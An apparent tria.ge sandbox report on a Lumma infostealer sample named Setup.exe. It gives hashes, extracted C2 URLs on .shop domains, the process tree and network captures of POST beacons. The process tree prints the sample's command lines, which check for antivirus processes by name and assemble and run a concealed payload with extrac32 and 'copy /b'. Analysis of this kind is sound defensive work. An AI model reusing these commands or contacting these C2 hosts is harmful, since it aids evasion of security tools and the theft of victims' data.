Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

Setup.exe

windows10-2004-x64

10

Setup.exe

windows11-21h2-x64

10

Resubmissions

03/01/2025, 03:28 UTC

250103-d1d8psxnfz 10

03/01/2025, 00:59 UTC

250103-bcehfsspgt 10

03/01/2025, 00:10 UTC

250103-agetcatrhp 10

02/01/2025, 23:44 UTC

250102-3rc2qazphs 10

02/01/2025, 23:34 UTC

250102-3khcvstjeq 10

02/01/2025, 19:18 UTC

250102-xz8wgavphj 10

02/01/2025, 04:32 UTC

250102-e57aqawlem 10

02/01/2025, 04:20 UTC

250102-eybkgavrej 10

02/01/2025, 04:14 UTC

250102-etyt7svpgq 10

02/01/2025, 03:52 UTC

250102-efgnrstrgl 10

Analysis

  • max time kernel
    39s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/01/2025, 04:20 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Setup.exe

  • Size

    800.0MB

  • MD5

    b4d4d19863fd8b7b64e2e8a1204aac62

  • SHA1

    64d1609b82e6054af14412a92724d8605b7d015d

  • SHA256

    56375ce34ece830c6770d768f1ed501a78c359a380c9576274dbbd19c9ef5aa3

  • SHA512

    e00fa8b5af32b334849e499f5f0be5a23aeb37ab2b28d2bf82cee2766d85c3fb1a874cd327467ebdd57475b2b42befb7507d2d6ac923020964e23f0a3f5a7bff

  • SSDEEP

    24576:KjatNrAGDrHrmxAztbD6Lf5aytZI9FmLaQWnnZp/fh+AR9wLsS9qB3Hcxx1VmLHA:PUGnHRbEau4FmUZpYARuISsV+VmLHRQl

Score
10/10
lummadiscoverystealer

Malware Config

Extracted

Family

lumma

C2

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

Extracted

Family

lumma

C2

https://abruptyopsn.shop/api

https://wholersorie.shop/api

https://framekgirus.shop/api

https://tirepublicerj.shop/api

https://noisycuttej.shop/api

https://rabidcowse.shop/api

https://cloudewahsj.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
    discovery
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Elderly Elderly.cmd & Elderly.cmd
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2344
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1452
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4092
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 833075
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3040
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Knights
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2348
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "COMMUNITIES" Expiration
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3232
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 833075\Auditor.com + Teacher + Belkin + Streams + Urls + Reunion + Le + Auctions + Suburban + Lotus + Cio 833075\Auditor.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5080
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Die + ..\Folding + ..\Compete + ..\Bukkake + ..\Newer + ..\Common + ..\Relying c
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3944
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\833075\Auditor.com
        Auditor.com c
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:936
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2972
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2608
    • C:\Users\Admin\AppData\Local\Temp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      1⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c move Elderly Elderly.cmd & Elderly.cmd
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3940
        • C:\Windows\SysWOW64\findstr.exe
          findstr /I "opssvc wrsa"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4004
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2372
        • C:\Windows\SysWOW64\findstr.exe
          findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1308
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c md 833075
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3836
        • C:\Windows\SysWOW64\extrac32.exe
          extrac32 /Y /E Knights
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1808
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c copy /b 833075\Auditor.com + Teacher + Belkin + Streams + Urls + Reunion + Le + Auctions + Suburban + Lotus + Cio 833075\Auditor.com
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2064
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c copy /b ..\Die + ..\Folding + ..\Compete + ..\Bukkake + ..\Newer + ..\Common + ..\Relying c
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4100
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\833075\Auditor.com
          Auditor.com c
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1736
        • C:\Windows\SysWOW64\choice.exe
          choice /d y /t 5
          3⤵
          • System Location Discovery: System Language Discovery
          PID:904

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      209.205.72.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      209.205.72.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      imsxHtkofZmzDdFO.imsxHtkofZmzDdFO
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      imsxHtkofZmzDdFO.imsxHtkofZmzDdFO
      IN A
      Response
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      throwupset.click
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      throwupset.click
      IN A
      Response
      throwupset.click
      IN A
      104.21.80.1
      throwupset.click
      IN A
      104.21.32.1
      throwupset.click
      IN A
      104.21.16.1
      throwupset.click
      IN A
      104.21.48.1
      throwupset.click
      IN A
      104.21.112.1
      throwupset.click
      IN A
      104.21.64.1
      throwupset.click
      IN A
      104.21.96.1
    • flag-us
      POST
      https://throwupset.click/api
      Auditor.com
      Remote address:
      104.21.80.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: throwupset.click
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=0733gvdmjtsrqcvf2k08o0pgah; expires=Sun, 27 Apr 2025 22:09:50 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8bb%2BdVibBzSrf8JtJt7GHzrVuddaKBZfStsp6%2Bji2CuSiwjM3FHwQy5CWs2j4REamM0OV%2B93ALOMiLcn2KV2GJnsIjQEfgflJh2VOHK9t%2BSf3CnjtBde4zwFfY%2F2YVnqrVJ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8e7be773da0-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=29621&min_rtt=25532&rtt_var=12217&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3507&recv_bytes=605&delivery_rate=105619&cwnd=253&unsent_bytes=0&cid=7c9efb0b2523250c&ts=258&x=0"
    • flag-us
      DNS
      nearycrepso.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      nearycrepso.shop
      IN A
      Response
    • flag-us
      DNS
      abruptyopsn.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      abruptyopsn.shop
      IN A
      Response
      abruptyopsn.shop
      IN A
      104.21.80.1
      abruptyopsn.shop
      IN A
      104.21.64.1
      abruptyopsn.shop
      IN A
      104.21.48.1
      abruptyopsn.shop
      IN A
      104.21.32.1
      abruptyopsn.shop
      IN A
      104.21.16.1
      abruptyopsn.shop
      IN A
      104.21.112.1
      abruptyopsn.shop
      IN A
      104.21.96.1
    • flag-us
      DNS
      197.87.175.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      197.87.175.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.80.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.80.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.130.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.130.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      https://abruptyopsn.shop/api
      Auditor.com
      Remote address:
      104.21.80.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: abruptyopsn.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=6r5kjr49uhcm546iv4f8ocm2o0; expires=Sun, 27 Apr 2025 22:09:50 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJE%2BzlTEoONZj0NtfoHvLebJ%2F5XR3VqUKFzrCuoX2RylIdaZJc9Kkhn10O7dJwl%2F4L4qmvVnTBJ9MhmcPLCAmtka93I%2BjmM5CXEOwvbSluJ1X7h4aPAppspJvxn7F13J%2BzuD"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8e9ef4cf650-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26752&min_rtt=25896&rtt_var=6642&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3509&recv_bytes=605&delivery_rate=131360&cwnd=253&unsent_bytes=0&cid=dc86930329c294ab&ts=200&x=0"
    • flag-us
      DNS
      wholersorie.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      wholersorie.shop
      IN A
      Response
      wholersorie.shop
      IN A
      104.21.41.51
      wholersorie.shop
      IN A
      172.67.160.114
    • flag-us
      POST
      https://wholersorie.shop/api
      Auditor.com
      Remote address:
      104.21.41.51:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: wholersorie.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=dke4hnm8vjekfk45isujkpdi2p; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=urZA5R2UBSreBucHFl2kokwzvp2fFGY%2BcQLL0UPv%2BP2k0VIn2I7TMW1o7nzsbPOaZT%2B%2FVGPDpDE7rDKisrR00DMwDlHoaWJA2xU59M1CZwiiouhG5kGs32MXEytCn5Uw7Bzw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8ebcd08ed03-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=27582&min_rtt=26515&rtt_var=7102&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3298&recv_bytes=605&delivery_rate=130610&cwnd=234&unsent_bytes=0&cid=bbdd1fb3e323961f&ts=242&x=0"
    • flag-us
      DNS
      framekgirus.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      framekgirus.shop
      IN A
      Response
      framekgirus.shop
      IN A
      172.67.179.160
      framekgirus.shop
      IN A
      104.21.18.19
    • flag-us
      POST
      https://framekgirus.shop/api
      Auditor.com
      Remote address:
      172.67.179.160:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: framekgirus.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=hlur5kspfbc2acmu027v2jv27j; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4eEPdadOJGKIXoDe9RGsVRJ6CELr2i6NXFzZ8kg42rxvKLcch0KzpzMM13QX7pENFYmsyywxERB%2BZSuN80kjGQFk4Wri3ed0HnnHZCtijX1EOjb2shO4mRvreT%2BpWl37hZ7"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8edd81a942b-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26751&min_rtt=26090&rtt_var=6545&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=605&delivery_rate=134112&cwnd=253&unsent_bytes=0&cid=3dab07fd1d8ab95d&ts=229&x=0"
    • flag-us
      DNS
      tirepublicerj.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      tirepublicerj.shop
      IN A
      Response
      tirepublicerj.shop
      IN A
      104.21.32.1
      tirepublicerj.shop
      IN A
      104.21.112.1
      tirepublicerj.shop
      IN A
      104.21.16.1
      tirepublicerj.shop
      IN A
      104.21.48.1
      tirepublicerj.shop
      IN A
      104.21.64.1
      tirepublicerj.shop
      IN A
      104.21.96.1
      tirepublicerj.shop
      IN A
      104.21.80.1
    • flag-us
      POST
      https://tirepublicerj.shop/api
      Auditor.com
      Remote address:
      104.21.32.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: tirepublicerj.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=le12e9e4ovjlmdvcetrbl3o4gr; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZatVysE4Ab%2F2yMFg3zG2Ewd9bTQzxWQE1wOQzgtAub2gqddpD0rADX5AlPiZCwWYT7JXBDYLjJONd1M%2BQpSel0bQnyk%2BpEvsOcS6FpONbvFsR9h3cR%2FpsiNPSdopxfaytDo6ARQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8efcf2cef44-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=28476&min_rtt=26059&rtt_var=7277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=609&delivery_rate=134352&cwnd=244&unsent_bytes=0&cid=3a02a8543c11f76f&ts=222&x=0"
    • flag-us
      DNS
      51.41.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      51.41.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      160.179.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      160.179.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      noisycuttej.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      noisycuttej.shop
      IN A
      Response
      noisycuttej.shop
      IN A
      104.21.71.146
      noisycuttej.shop
      IN A
      172.67.170.178
    • flag-us
      POST
      https://noisycuttej.shop/api
      Auditor.com
      Remote address:
      104.21.71.146:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: noisycuttej.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=7e2igtp4vfo222p69cso5joi8a; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2B%2B%2FPEnTc5ofEe01%2F8%2BORRh4XkIiuwDnYqnDjHLBtmAjA0iqn8phvDVc94CBta6G%2FklML6EbRPx9QQKQcYPIWtBrt64gCt5SqthzNfqjyDZ0eZewshOxEG60D6uwM71bkbW%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f1bc9741a0-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26820&min_rtt=26248&rtt_var=6435&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=605&delivery_rate=136103&cwnd=253&unsent_bytes=0&cid=529b4bdc6eb24ca8&ts=235&x=0"
    • flag-us
      DNS
      rabidcowse.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      rabidcowse.shop
      IN A
      Response
      rabidcowse.shop
      IN A
      104.21.7.224
      rabidcowse.shop
      IN A
      172.67.156.127
    • flag-us
      POST
      https://rabidcowse.shop/api
      Auditor.com
      Remote address:
      104.21.7.224:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: rabidcowse.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=nijdr8l2kb4r78863lj233jo2k; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2nbUwfRgqb7I5QGXqQRWl%2Bvz41iV6u5dR31AKUUlZcSl7AH9KNJ86nFiVHYBwYD8WfZGVHcYnh9V42M%2BZ8KpzJSpi1HprlPoSc4mrimHHfniXTrmd7pTvzxzkIwRWcbq74%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f3b8a7ef21-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26634&min_rtt=26130&rtt_var=6200&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=139709&cwnd=253&unsent_bytes=0&cid=e5126bc234ce4dc3&ts=223&x=0"
    • flag-us
      DNS
      cloudewahsj.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      cloudewahsj.shop
      IN A
      Response
      cloudewahsj.shop
      IN A
      104.21.112.1
      cloudewahsj.shop
      IN A
      104.21.32.1
      cloudewahsj.shop
      IN A
      104.21.16.1
      cloudewahsj.shop
      IN A
      104.21.80.1
      cloudewahsj.shop
      IN A
      104.21.96.1
      cloudewahsj.shop
      IN A
      104.21.64.1
      cloudewahsj.shop
      IN A
      104.21.48.1
    • flag-us
      POST
      https://cloudewahsj.shop/api
      Auditor.com
      Remote address:
      104.21.112.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: cloudewahsj.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=0psca6cps3a046k54jg5bjepuc; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a1%2FN4bcQwdZftIvRYCPXg6sLIzS2TGWLhZ6%2FifraDPFkWG6xi8GVAZgXWUAPIhHwTN9O6gAxThJDP0mA3gagxmMKMGlttlAwjz0r%2BREwL%2BBG6ZRcn029Ik1ZvuH5JGg7K7cK"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f5bec1ecfd-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26897&min_rtt=26294&rtt_var=6507&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=605&delivery_rate=135276&cwnd=253&unsent_bytes=0&cid=b094e36699658fc5&ts=217&x=0"
    • flag-us
      DNS
      1.32.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.32.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      146.71.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      146.71.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      224.7.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      224.7.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      steamcommunity.com
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      steamcommunity.com
      IN A
      Response
      steamcommunity.com
      IN A
      23.214.143.155
    • flag-gb
      GET
      https://steamcommunity.com/profiles/76561199724331900
      Auditor.com
      Remote address:
      23.214.143.155:443
      Request
      GET /profiles/76561199724331900 HTTP/1.1
      Connection: Keep-Alive
